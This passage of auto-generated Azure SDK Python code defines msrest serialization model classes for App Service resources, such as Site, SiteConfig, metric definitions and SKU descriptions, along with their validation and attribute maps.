    :ivar properties: Resource metric definition properties.
    :vartype properties: dict[str, str]
    """

    # Everything except the inherited, writable ``kind`` is server-populated.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'name_properties_name': {'readonly': True},
        'unit': {'readonly': True},
        'primary_aggregation_type': {'readonly': True},
        'metric_availabilities': {'readonly': True},
        'resource_uri': {'readonly': True},
        'id_properties_id': {'readonly': True},
        'properties': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'ResourceMetricName'},
        'unit': {'key': 'properties.unit', 'type': 'str'},
        'primary_aggregation_type': {'key': 'properties.primaryAggregationType', 'type': 'str'},
        'metric_availabilities': {'key': 'properties.metricAvailabilities', 'type': '[ResourceMetricAvailability]'},
        'resource_uri': {'key': 'properties.resourceUri', 'type': 'str'},
        'id_properties_id': {'key': 'properties.id', 'type': 'str'},
        'properties': {'key': 'properties.properties', 'type': '{str}'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # All metric metadata is read-only: start unset and let
        # deserialization populate the values.
        for attr in ('name_properties_name', 'unit', 'primary_aggregation_type',
                     'metric_availabilities', 'resource_uri', 'id_properties_id',
                     'properties'):
            setattr(self, attr, None)
class ResourceMetricDefinitionCollection(msrest.serialization.Model):
    """A page of metric definitions.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricDefinition]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """

    _validation = {'value': {'required': True}, 'next_link': {'readonly': True}}

    _attribute_map = {
        'value': {'key': 'value', 'type': '[ResourceMetricDefinition]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.value = kwargs['value']  # required -- raises KeyError if omitted
        self.next_link = None  # paging link supplied by the service
class ResourceMetricName(msrest.serialization.Model):
    """Name of a metric for any resource .

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar value: metric name value.
    :vartype value: str
    :ivar localized_value: Localized metric name value.
    :vartype localized_value: str
    """

    _validation = {'value': {'readonly': True}, 'localized_value': {'readonly': True}}

    _attribute_map = {
        'value': {'key': 'value', 'type': 'str'},
        'localized_value': {'key': 'localizedValue', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Server-populated; callers never supply these.
        self.value = None
        self.localized_value = None
class ResourceMetricProperty(msrest.serialization.Model):
    """Resource metric property.

    :param key: Key for resource metric property.
    :type key: str
    :param value: Value of pair.
    :type value: str
    """

    _attribute_map = {
        'key': {'key': 'key', 'type': 'str'},
        'value': {'key': 'value', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Both halves of the key/value pair are optional on input.
        self.key = kwargs.get('key')
        self.value = kwargs.get('value')
class ResourceMetricValue(msrest.serialization.Model):
    """Value of resource metric.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar timestamp: Value timestamp.
    :vartype timestamp: str
    :ivar average: Value average.
    :vartype average: float
    :ivar minimum: Value minimum.
    :vartype minimum: float
    :ivar maximum: Value maximum.
    :vartype maximum: float
    :ivar total: Value total.
    :vartype total: float
    :ivar count: Value count.
    :vartype count: float
    :ivar properties: Resource metric properties collection.
    :vartype properties: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricProperty]
    """

    # Every field is read-only: metric values only flow service -> client.
    _validation = {
        field: {'readonly': True}
        for field in ('timestamp', 'average', 'minimum', 'maximum',
                      'total', 'count', 'properties')
    }

    _attribute_map = {
        'timestamp': {'key': 'timestamp', 'type': 'str'},
        'average': {'key': 'average', 'type': 'float'},
        'minimum': {'key': 'minimum', 'type': 'float'},
        'maximum': {'key': 'maximum', 'type': 'float'},
        'total': {'key': 'total', 'type': 'float'},
        'count': {'key': 'count', 'type': 'float'},
        'properties': {'key': 'properties', 'type': '[ResourceMetricProperty]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Initialise every read-only attribute unset.
        self.timestamp = None
        self.average = None
        self.minimum = None
        self.maximum = None
        self.total = None
        self.count = None
        self.properties = None
class Site(Resource):
    """A web app, a mobile app backend, or an API app.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :param location: Required. Resource Location.
    :type location: str
    :ivar type: Resource type.
    :vartype type: str
    :param tags: A set of tags. Resource tags.
    :type tags: dict[str, str]
    :param identity: Managed service identity.
    :type identity: ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentity
    :ivar state: Current state of the app.
    :vartype state: str
    :ivar host_names: Hostnames associated with the app.
    :vartype host_names: list[str]
    :ivar repository_site_name: Name of the repository site.
    :vartype repository_site_name: str
    :ivar usage_state: State indicating whether the app has exceeded its quota usage. Read-only.
     Possible values include: "Normal", "Exceeded".
    :vartype usage_state: str or ~azure.mgmt.web.v2016_09_01.models.UsageState
    :param enabled: :code:`<code>true</code>` if the app is enabled; otherwise,
     :code:`<code>false</code>`. Setting this value to false disables the app (takes the app
     offline).
    :type enabled: bool
    :ivar enabled_host_names: Enabled hostnames for the app.Hostnames need to be assigned (see
     HostNames) AND enabled. Otherwise,
     the app is not served on those hostnames.
    :vartype enabled_host_names: list[str]
    :ivar availability_state: Management information availability state for the app. Possible
     values include: "Normal", "Limited", "DisasterRecoveryMode".
    :vartype availability_state: str or ~azure.mgmt.web.v2016_09_01.models.SiteAvailabilityState
    :param host_name_ssl_states: Hostname SSL states are used to manage the SSL bindings for app's
     hostnames.
    :type host_name_ssl_states: list[~azure.mgmt.web.v2016_09_01.models.HostNameSslState]
    :param server_farm_id: Resource ID of the associated App Service plan, formatted as:
     "/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
    :type server_farm_id: str
    :param reserved: :code:`<code>true</code>` if reserved; otherwise, :code:`<code>false</code>`.
    :type reserved: bool
    :ivar last_modified_time_utc: Last time the app was modified, in UTC. Read-only.
    :vartype last_modified_time_utc: ~datetime.datetime
    :param site_config: Configuration of the app.
    :type site_config: ~azure.mgmt.web.v2016_09_01.models.SiteConfig
    :ivar traffic_manager_host_names: Azure Traffic Manager hostnames associated with the app.
     Read-only.
    :vartype traffic_manager_host_names: list[str]
    :param scm_site_also_stopped: :code:`<code>true</code>` to stop SCM (KUDU) site when the app is
     stopped; otherwise, :code:`<code>false</code>`. The default is :code:`<code>false</code>`.
    :type scm_site_also_stopped: bool
    :ivar target_swap_slot: Specifies which deployment slot this app will swap into. Read-only.
    :vartype target_swap_slot: str
    :param hosting_environment_profile: App Service Environment to use for the app.
    :type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
    :param client_affinity_enabled: :code:`<code>true</code>` to enable client affinity;
     :code:`<code>false</code>` to stop sending session affinity cookies, which route client
     requests in the same session to the same instance. Default is :code:`<code>true</code>`.
    :type client_affinity_enabled: bool
    :param client_cert_enabled: :code:`<code>true</code>` to enable client certificate
     authentication (TLS mutual authentication); otherwise, :code:`<code>false</code>`. Default is
     :code:`<code>false</code>`.
    :type client_cert_enabled: bool
    :param host_names_disabled: :code:`<code>true</code>` to disable the public hostnames of the
     app; otherwise, :code:`<code>false</code>`.
     If :code:`<code>true</code>`, the app is only accessible via API management process.
    :type host_names_disabled: bool
    :ivar outbound_ip_addresses: List of IP addresses that the app uses for outbound connections
     (e.g. database access). Includes VIPs from tenants that site can be hosted with current
     settings. Read-only.
    :vartype outbound_ip_addresses: str
    :ivar possible_outbound_ip_addresses: List of IP addresses that the app uses for outbound
     connections (e.g. database access). Includes VIPs from all tenants. Read-only.
    :vartype possible_outbound_ip_addresses: str
    :param container_size: Size of the function container.
    :type container_size: int
    :param daily_memory_time_quota: Maximum allowed daily memory-time quota (applicable on dynamic
     apps only).
    :type daily_memory_time_quota: int
    :ivar suspended_till: App suspended till in case memory-time quota is exceeded.
    :vartype suspended_till: ~datetime.datetime
    :ivar max_number_of_workers: Maximum number of workers.
     This only applies to Functions container.
    :vartype max_number_of_workers: int
    :param cloning_info: If specified during app creation, the app is cloned from a source app.
    :type cloning_info: ~azure.mgmt.web.v2016_09_01.models.CloningInfo
    :param snapshot_info: If specified during app creation, the app is created from a previous
     snapshot.
    :type snapshot_info: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryRequest
    :ivar resource_group: Name of the resource group the app belongs to. Read-only.
    :vartype resource_group: str
    :ivar is_default_container: :code:`<code>true</code>` if the app is a default container;
     otherwise, :code:`<code>false</code>`.
    :vartype is_default_container: bool
    :ivar default_host_name: Default hostname of the app. Read-only.
    :vartype default_host_name: str
    :ivar slot_swap_status: Status of the last deployment slot swap operation.
    :vartype slot_swap_status: ~azure.mgmt.web.v2016_09_01.models.SlotSwapStatus
    :param https_only: HttpsOnly: configures a web site to accept only https requests. Issues
     redirect for
     http requests.
    :type https_only: bool
    """

    # 'location' is the only caller-required field; entries marked 'readonly'
    # are populated by the service on responses and ignored on requests.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'location': {'required': True},
        'type': {'readonly': True},
        'state': {'readonly': True},
        'host_names': {'readonly': True},
        'repository_site_name': {'readonly': True},
        'usage_state': {'readonly': True},
        'enabled_host_names': {'readonly': True},
        'availability_state': {'readonly': True},
        'last_modified_time_utc': {'readonly': True},
        'traffic_manager_host_names': {'readonly': True},
        'target_swap_slot': {'readonly': True},
        'outbound_ip_addresses': {'readonly': True},
        'possible_outbound_ip_addresses': {'readonly': True},
        'suspended_till': {'readonly': True},
        'max_number_of_workers': {'readonly': True},
        'resource_group': {'readonly': True},
        'is_default_container': {'readonly': True},
        'default_host_name': {'readonly': True},
        'slot_swap_status': {'readonly': True},
    }

    # Wire-format mapping; dotted keys ('properties.<name>') are serialized
    # nested under the JSON 'properties' object per msrest's convention.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'location': {'key': 'location', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
        'identity': {'key': 'identity', 'type': 'ManagedServiceIdentity'},
        'state': {'key': 'properties.state', 'type': 'str'},
        'host_names': {'key': 'properties.hostNames', 'type': '[str]'},
        'repository_site_name': {'key': 'properties.repositorySiteName', 'type': 'str'},
        'usage_state': {'key': 'properties.usageState', 'type': 'str'},
        'enabled': {'key': 'properties.enabled', 'type': 'bool'},
        'enabled_host_names': {'key': 'properties.enabledHostNames', 'type': '[str]'},
        'availability_state': {'key': 'properties.availabilityState', 'type': 'str'},
        'host_name_ssl_states': {'key': 'properties.hostNameSslStates', 'type': '[HostNameSslState]'},
        'server_farm_id': {'key': 'properties.serverFarmId', 'type': 'str'},
        'reserved': {'key': 'properties.reserved', 'type': 'bool'},
        'last_modified_time_utc': {'key': 'properties.lastModifiedTimeUtc', 'type': 'iso-8601'},
        'site_config': {'key': 'properties.siteConfig', 'type': 'SiteConfig'},
        'traffic_manager_host_names': {'key': 'properties.trafficManagerHostNames', 'type': '[str]'},
        'scm_site_also_stopped': {'key': 'properties.scmSiteAlsoStopped', 'type': 'bool'},
        'target_swap_slot': {'key': 'properties.targetSwapSlot', 'type': 'str'},
        'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
        'client_affinity_enabled': {'key': 'properties.clientAffinityEnabled', 'type': 'bool'},
        'client_cert_enabled': {'key': 'properties.clientCertEnabled', 'type': 'bool'},
        'host_names_disabled': {'key': 'properties.hostNamesDisabled', 'type': 'bool'},
        'outbound_ip_addresses': {'key': 'properties.outboundIpAddresses', 'type': 'str'},
        'possible_outbound_ip_addresses': {'key': 'properties.possibleOutboundIpAddresses', 'type': 'str'},
        'container_size': {'key': 'properties.containerSize', 'type': 'int'},
        'daily_memory_time_quota': {'key': 'properties.dailyMemoryTimeQuota', 'type': 'int'},
        'suspended_till': {'key': 'properties.suspendedTill', 'type': 'iso-8601'},
        'max_number_of_workers': {'key': 'properties.maxNumberOfWorkers', 'type': 'int'},
        'cloning_info': {'key': 'properties.cloningInfo', 'type': 'CloningInfo'},
        'snapshot_info': {'key': 'properties.snapshotInfo', 'type': 'SnapshotRecoveryRequest'},
        'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
        'is_default_container': {'key': 'properties.isDefaultContainer', 'type': 'bool'},
        'default_host_name': {'key': 'properties.defaultHostName', 'type': 'str'},
        'slot_swap_status': {'key': 'properties.slotSwapStatus', 'type': 'SlotSwapStatus'},
        'https_only': {'key': 'properties.httpsOnly', 'type': 'bool'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(Site, self).__init__(**kwargs)
        # Caller-writable settings are taken from kwargs; read-only attributes
        # start as None and are filled in by deserialization.
        self.identity = kwargs.get('identity', None)
        self.state = None
        self.host_names = None
        self.repository_site_name = None
        self.usage_state = None
        self.enabled = kwargs.get('enabled', None)
        self.enabled_host_names = None
        self.availability_state = None
        self.host_name_ssl_states = kwargs.get('host_name_ssl_states', None)
        self.server_farm_id = kwargs.get('server_farm_id', None)
        self.reserved = kwargs.get('reserved', False)  # defaults to False, not None
        self.last_modified_time_utc = None
        self.site_config = kwargs.get('site_config', None)
        self.traffic_manager_host_names = None
        self.scm_site_also_stopped = kwargs.get('scm_site_also_stopped', False)  # documented default is false
        self.target_swap_slot = None
        self.hosting_environment_profile = kwargs.get('hosting_environment_profile', None)
        self.client_affinity_enabled = kwargs.get('client_affinity_enabled', None)
        self.client_cert_enabled = kwargs.get('client_cert_enabled', None)
        self.host_names_disabled = kwargs.get('host_names_disabled', None)
        self.outbound_ip_addresses = None
        self.possible_outbound_ip_addresses = None
        self.container_size = kwargs.get('container_size', None)
        self.daily_memory_time_quota = kwargs.get('daily_memory_time_quota', None)
        self.suspended_till = None
        self.max_number_of_workers = None
        self.cloning_info = kwargs.get('cloning_info', None)
        self.snapshot_info = kwargs.get('snapshot_info', None)
        self.resource_group = None
        self.is_default_container = None
        self.default_host_name = None
        self.slot_swap_status = None
        self.https_only = kwargs.get('https_only', None)
class SiteConfig(msrest.serialization.Model):
    """Configuration of an App Service app.

    Variables are only populated by the server, and will be ignored when sending a request.

    :param number_of_workers: Number of workers.
    :type number_of_workers: int
    :param default_documents: Default documents.
    :type default_documents: list[str]
    :param net_framework_version: .NET Framework version.
    :type net_framework_version: str
    :param php_version: Version of PHP.
    :type php_version: str
    :param python_version: Version of Python.
    :type python_version: str
    :param node_version: Version of Node.js.
    :type node_version: str
    :param linux_fx_version: Linux App Framework and version.
    :type linux_fx_version: str
    :param request_tracing_enabled: :code:`<code>true</code>` if request tracing is enabled;
     otherwise, :code:`<code>false</code>`.
    :type request_tracing_enabled: bool
    :param request_tracing_expiration_time: Request tracing expiration time.
    :type request_tracing_expiration_time: ~datetime.datetime
    :param remote_debugging_enabled: :code:`<code>true</code>` if remote debugging is enabled;
     otherwise, :code:`<code>false</code>`.
    :type remote_debugging_enabled: bool
    :param remote_debugging_version: Remote debugging version.
    :type remote_debugging_version: str
    :param http_logging_enabled: :code:`<code>true</code>` if HTTP logging is enabled; otherwise,
     :code:`<code>false</code>`.
    :type http_logging_enabled: bool
    :param logs_directory_size_limit: HTTP logs directory size limit.
    :type logs_directory_size_limit: int
    :param detailed_error_logging_enabled: :code:`<code>true</code>` if detailed error logging is
     enabled; otherwise, :code:`<code>false</code>`.
    :type detailed_error_logging_enabled: bool
    :param publishing_username: Publishing user name.
    :type publishing_username: str
    :param app_settings: Application settings.
    :type app_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
    :param connection_strings: Connection strings.
    :type connection_strings: list[~azure.mgmt.web.v2016_09_01.models.ConnStringInfo]
    :ivar machine_key: Site MachineKey.
    :vartype machine_key: ~azure.mgmt.web.v2016_09_01.models.SiteMachineKey
    :param handler_mappings: Handler mappings.
    :type handler_mappings: list[~azure.mgmt.web.v2016_09_01.models.HandlerMapping]
    :param document_root: Document root.
    :type document_root: str
    :param scm_type: SCM type. Possible values include: "None", "Dropbox", "Tfs", "LocalGit",
     "GitHub", "CodePlexGit", "CodePlexHg", "BitbucketGit", "BitbucketHg", "ExternalGit",
     "ExternalHg", "OneDrive", "VSO".
    :type scm_type: str or ~azure.mgmt.web.v2016_09_01.models.ScmType
    :param use32_bit_worker_process: :code:`<code>true</code>` to use 32-bit worker process;
     otherwise, :code:`<code>false</code>`.
    :type use32_bit_worker_process: bool
    :param web_sockets_enabled: :code:`<code>true</code>` if WebSocket is enabled; otherwise,
     :code:`<code>false</code>`.
    :type web_sockets_enabled: bool
    :param always_on: :code:`<code>true</code>` if Always On is enabled; otherwise,
     :code:`<code>false</code>`.
    :type always_on: bool
    :param java_version: Java version.
    :type java_version: str
    :param java_container: Java container.
    :type java_container: str
    :param java_container_version: Java container version.
    :type java_container_version: str
    :param app_command_line: App command line to launch.
    :type app_command_line: str
    :param managed_pipeline_mode: Managed pipeline mode. Possible values include: "Integrated",
     "Classic".
    :type managed_pipeline_mode: str or ~azure.mgmt.web.v2016_09_01.models.ManagedPipelineMode
    :param virtual_applications: Virtual applications.
    :type virtual_applications: list[~azure.mgmt.web.v2016_09_01.models.VirtualApplication]
    :param load_balancing: Site load balancing. Possible values include: "WeightedRoundRobin",
     "LeastRequests", "LeastResponseTime", "WeightedTotalTraffic", "RequestHash".
    :type load_balancing: str or ~azure.mgmt.web.v2016_09_01.models.SiteLoadBalancing
    :param experiments: This is work around for polymorphic types.
    :type experiments: ~azure.mgmt.web.v2016_09_01.models.Experiments
    :param limits: Site limits.
    :type limits: ~azure.mgmt.web.v2016_09_01.models.SiteLimits
    :param auto_heal_enabled: :code:`<code>true</code>` if Auto Heal is enabled; otherwise,
     :code:`<code>false</code>`.
    :type auto_heal_enabled: bool
    :param auto_heal_rules: Auto Heal rules.
    :type auto_heal_rules: ~azure.mgmt.web.v2016_09_01.models.AutoHealRules
    :param tracing_options: Tracing options.
    :type tracing_options: str
    :param vnet_name: Virtual Network name.
    :type vnet_name: str
    :param cors: Cross-Origin Resource Sharing (CORS) settings.
    :type cors: ~azure.mgmt.web.v2016_09_01.models.CorsSettings
    :param push: Push endpoint settings.
    :type push: ~azure.mgmt.web.v2016_09_01.models.PushSettings
    :param api_definition: Information about the formal API definition for the app.
    :type api_definition: ~azure.mgmt.web.v2016_09_01.models.ApiDefinitionInfo
    :param auto_swap_slot_name: Auto-swap slot name.
    :type auto_swap_slot_name: str
    :param local_my_sql_enabled: :code:`<code>true</code>` to enable local MySQL; otherwise,
     :code:`<code>false</code>`.
    :type local_my_sql_enabled: bool
    :param ip_security_restrictions: IP security restrictions.
    :type ip_security_restrictions: list[~azure.mgmt.web.v2016_09_01.models.IpSecurityRestriction]
    :param http20_enabled: Http20Enabled: configures a web site to allow clients to connect over
     http2.0.
    :type http20_enabled: bool
    :param min_tls_version: MinTlsVersion: configures the minimum version of TLS required for SSL
     requests. Possible values include: "1.0", "1.1", "1.2".
    :type min_tls_version: str or ~azure.mgmt.web.v2016_09_01.models.SupportedTlsVersions
    """

    # 'machine_key' is the only server-populated (read-only) member here.
    _validation = {
        'machine_key': {'readonly': True},
    }

    _attribute_map = {
        'number_of_workers': {'key': 'numberOfWorkers', 'type': 'int'},
        'default_documents': {'key': 'defaultDocuments', 'type': '[str]'},
        'net_framework_version': {'key': 'netFrameworkVersion', 'type': 'str'},
        'php_version': {'key': 'phpVersion', 'type': 'str'},
        'python_version': {'key': 'pythonVersion', 'type': 'str'},
        'node_version': {'key': 'nodeVersion', 'type': 'str'},
        'linux_fx_version': {'key': 'linuxFxVersion', 'type': 'str'},
        'request_tracing_enabled': {'key': 'requestTracingEnabled', 'type': 'bool'},
        'request_tracing_expiration_time': {'key': 'requestTracingExpirationTime', 'type': 'iso-8601'},
        'remote_debugging_enabled': {'key': 'remoteDebuggingEnabled', 'type': 'bool'},
        'remote_debugging_version': {'key': 'remoteDebuggingVersion', 'type': 'str'},
        'http_logging_enabled': {'key': 'httpLoggingEnabled', 'type': 'bool'},
        'logs_directory_size_limit': {'key': 'logsDirectorySizeLimit', 'type': 'int'},
        'detailed_error_logging_enabled': {'key': 'detailedErrorLoggingEnabled', 'type': 'bool'},
        'publishing_username': {'key': 'publishingUsername', 'type': 'str'},
        'app_settings': {'key': 'appSettings', 'type': '[NameValuePair]'},
        'connection_strings': {'key': 'connectionStrings', 'type': '[ConnStringInfo]'},
        'machine_key': {'key': 'machineKey', 'type': 'SiteMachineKey'},
        'handler_mappings': {'key': 'handlerMappings', 'type': '[HandlerMapping]'},
        'document_root': {'key': 'documentRoot', 'type': 'str'},
        'scm_type': {'key': 'scmType', 'type': 'str'},
        'use32_bit_worker_process': {'key': 'use32BitWorkerProcess', 'type': 'bool'},
        'web_sockets_enabled': {'key': 'webSocketsEnabled', 'type': 'bool'},
        'always_on': {'key': 'alwaysOn', 'type': 'bool'},
        'java_version': {'key': 'javaVersion', 'type': 'str'},
        'java_container': {'key': 'javaContainer', 'type': 'str'},
        'java_container_version': {'key': 'javaContainerVersion', 'type': 'str'},
        'app_command_line': {'key': 'appCommandLine', 'type': 'str'},
        'managed_pipeline_mode': {'key': 'managedPipelineMode', 'type': 'str'},
        'virtual_applications': {'key': 'virtualApplications', 'type': '[VirtualApplication]'},
        'load_balancing': {'key': 'loadBalancing', 'type': 'str'},
        'experiments': {'key': 'experiments', 'type': 'Experiments'},
        'limits': {'key': 'limits', 'type': 'SiteLimits'},
        'auto_heal_enabled': {'key': 'autoHealEnabled', 'type': 'bool'},
        'auto_heal_rules': {'key': 'autoHealRules', 'type': 'AutoHealRules'},
        'tracing_options': {'key': 'tracingOptions', 'type': 'str'},
        'vnet_name': {'key': 'vnetName', 'type': 'str'},
        'cors': {'key': 'cors', 'type': 'CorsSettings'},
        'push': {'key': 'push', 'type': 'PushSettings'},
        'api_definition': {'key': 'apiDefinition', 'type': 'ApiDefinitionInfo'},
        'auto_swap_slot_name': {'key': 'autoSwapSlotName', 'type': 'str'},
        'local_my_sql_enabled': {'key': 'localMySqlEnabled', 'type': 'bool'},
        'ip_security_restrictions': {'key': 'ipSecurityRestrictions', 'type': '[IpSecurityRestriction]'},
        'http20_enabled': {'key': 'http20Enabled', 'type': 'bool'},
        'min_tls_version': {'key': 'minTlsVersion', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(SiteConfig, self).__init__(**kwargs)
        # Most settings are plain optional kwargs; note the non-None defaults:
        # net_framework_version="v4.6", local_my_sql_enabled=False, http20_enabled=True.
        self.number_of_workers = kwargs.get('number_of_workers', None)
        self.default_documents = kwargs.get('default_documents', None)
        self.net_framework_version = kwargs.get('net_framework_version', "v4.6")  # non-None default
        self.php_version = kwargs.get('php_version', None)
        self.python_version = kwargs.get('python_version', None)
        self.node_version = kwargs.get('node_version', None)
        self.linux_fx_version = kwargs.get('linux_fx_version', None)
        self.request_tracing_enabled = kwargs.get('request_tracing_enabled', None)
        self.request_tracing_expiration_time = kwargs.get('request_tracing_expiration_time', None)
        self.remote_debugging_enabled = kwargs.get('remote_debugging_enabled', None)
        self.remote_debugging_version = kwargs.get('remote_debugging_version', None)
        self.http_logging_enabled = kwargs.get('http_logging_enabled', None)
        self.logs_directory_size_limit = kwargs.get('logs_directory_size_limit', None)
        self.detailed_error_logging_enabled = kwargs.get('detailed_error_logging_enabled', None)
        self.publishing_username = kwargs.get('publishing_username', None)
        self.app_settings = kwargs.get('app_settings', None)
        self.connection_strings = kwargs.get('connection_strings', None)
        self.machine_key = None  # read-only; populated by the service
        self.handler_mappings = kwargs.get('handler_mappings', None)
        self.document_root = kwargs.get('document_root', None)
        self.scm_type = kwargs.get('scm_type', None)
        self.use32_bit_worker_process = kwargs.get('use32_bit_worker_process', None)
        self.web_sockets_enabled = kwargs.get('web_sockets_enabled', None)
        self.always_on = kwargs.get('always_on', None)
        self.java_version = kwargs.get('java_version', None)
        self.java_container = kwargs.get('java_container', None)
        self.java_container_version = kwargs.get('java_container_version', None)
        self.app_command_line = kwargs.get('app_command_line', None)
        self.managed_pipeline_mode = kwargs.get('managed_pipeline_mode', None)
        self.virtual_applications = kwargs.get('virtual_applications', None)
        self.load_balancing = kwargs.get('load_balancing', None)
        self.experiments = kwargs.get('experiments', None)
        self.limits = kwargs.get('limits', None)
        self.auto_heal_enabled = kwargs.get('auto_heal_enabled', None)
        self.auto_heal_rules = kwargs.get('auto_heal_rules', None)
        self.tracing_options = kwargs.get('tracing_options', None)
        self.vnet_name = kwargs.get('vnet_name', None)
        self.cors = kwargs.get('cors', None)
        self.push = kwargs.get('push', None)
        self.api_definition = kwargs.get('api_definition', None)
        self.auto_swap_slot_name = kwargs.get('auto_swap_slot_name', None)
        self.local_my_sql_enabled = kwargs.get('local_my_sql_enabled', False)  # defaults to False
        self.ip_security_restrictions = kwargs.get('ip_security_restrictions', None)
        self.http20_enabled = kwargs.get('http20_enabled', True)  # defaults to True
        self.min_tls_version = kwargs.get('min_tls_version', None)
class SiteLimits(msrest.serialization.Model):
    """Metric limits set on an app.

    :param max_percentage_cpu: Maximum allowed CPU usage percentage.
    :type max_percentage_cpu: float
    :param max_memory_in_mb: Maximum allowed memory usage in MB.
    :type max_memory_in_mb: long
    :param max_disk_size_in_mb: Maximum allowed disk size usage in MB.
    :type max_disk_size_in_mb: long
    """

    _attribute_map = {
        'max_percentage_cpu': {'key': 'maxPercentageCpu', 'type': 'float'},
        'max_memory_in_mb': {'key': 'maxMemoryInMb', 'type': 'long'},
        'max_disk_size_in_mb': {'key': 'maxDiskSizeInMb', 'type': 'long'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Every limit is optional on input.
        self.max_percentage_cpu = kwargs.get('max_percentage_cpu')
        self.max_memory_in_mb = kwargs.get('max_memory_in_mb')
        self.max_disk_size_in_mb = kwargs.get('max_disk_size_in_mb')
class SiteMachineKey(msrest.serialization.Model):
    """MachineKey of an app.

    :param validation: MachineKey validation.
    :type validation: str
    :param validation_key: Validation key.
    :type validation_key: str
    :param decryption: Algorithm used for decryption.
    :type decryption: str
    :param decryption_key: Decryption key.
    :type decryption_key: str
    """

    _attribute_map = {
        'validation': {'key': 'validation', 'type': 'str'},
        'validation_key': {'key': 'validationKey', 'type': 'str'},
        'decryption': {'key': 'decryption', 'type': 'str'},
        'decryption_key': {'key': 'decryptionKey', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # All four machine-key settings are optional on input.
        for name in ('validation', 'validation_key', 'decryption', 'decryption_key'):
            setattr(self, name, kwargs.get(name))
class SkuCapacity(msrest.serialization.Model):
    """Description of the App Service plan scale options.

    :param minimum: Minimum number of workers for this App Service plan SKU.
    :type minimum: int
    :param maximum: Maximum number of workers for this App Service plan SKU.
    :type maximum: int
    :param default: Default number of workers for this App Service plan SKU.
    :type default: int
    :param scale_type: Available scale configurations for an App Service plan.
    :type scale_type: str
    """

    _attribute_map = {
        'minimum': {'key': 'minimum', 'type': 'int'},
        'maximum': {'key': 'maximum', 'type': 'int'},
        'default': {'key': 'default', 'type': 'int'},
        'scale_type': {'key': 'scaleType', 'type': 'str'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Each scale option is optional on input.
        self.minimum = kwargs.get('minimum')
        self.maximum = kwargs.get('maximum')
        self.default = kwargs.get('default')
        self.scale_type = kwargs.get('scale_type')
class SkuDescription(msrest.serialization.Model):
    """Description of a SKU for a scalable resource.

    :param name: Name of the resource SKU.
    :type name: str
    :param tier: Service tier of the resource SKU.
    :type tier: str
    :param size: Size specifier of the resource SKU.
    :type size: str
    :param family: Family code of the resource SKU.
    :type family: str
    :param capacity: Current number of instances assigned to the resource.
    :type capacity: int
    :param sku_capacity: Min, max, and default scale values of the SKU.
    :type sku_capacity: ~azure.mgmt.web.v2016_09_01.models.SkuCapacity
    :param locations: Locations of the SKU.
    :type locations: list[str]
    :param capabilities: Capabilities of the SKU, e.g., is traffic manager enabled?.
    :type capabilities: list[~azure.mgmt.web.v2016_09_01.models.Capability]
    """

    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'tier': {'key': 'tier', 'type': 'str'},
        'size': {'key': 'size', 'type': 'str'},
        'family': {'key': 'family', 'type': 'str'},
        'capacity': {'key': 'capacity', 'type': 'int'},
        'sku_capacity': {'key': 'skuCapacity', 'type': 'SkuCapacity'},
        'locations': {'key': 'locations', 'type': '[str]'},
        'capabilities': {'key': 'capabilities', 'type': '[Capability]'},
    }

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # All SKU descriptors are optional on input.
        self.name = kwargs.get('name')
        self.tier = kwargs.get('tier')
        self.size = kwargs.get('size')
        self.family = kwargs.get('family')
        self.capacity = kwargs.get('capacity')
        self.sku_capacity = kwargs.get('sku_capacity')
        self.locations = kwargs.get('locations')
        self.capabilities = kwargs.get('capabilities')
class SkuInfo(msrest.serialization.Model):
    """SKU discovery information.

    :param resource_type: Resource type that this SKU applies to.
    :type resource_type: str
    :param sku: Name and tier of the SKU.
    :type sku: ~azure.mgmt.web.v2016_09_01.models.SkuDescription
    :param capacity: Min, max and default scale values of the SKU.
    :type capacity: ~azure.mgmt.web.v2016_09_01.models.SkuCapacity
    """

    _attribute_map = {
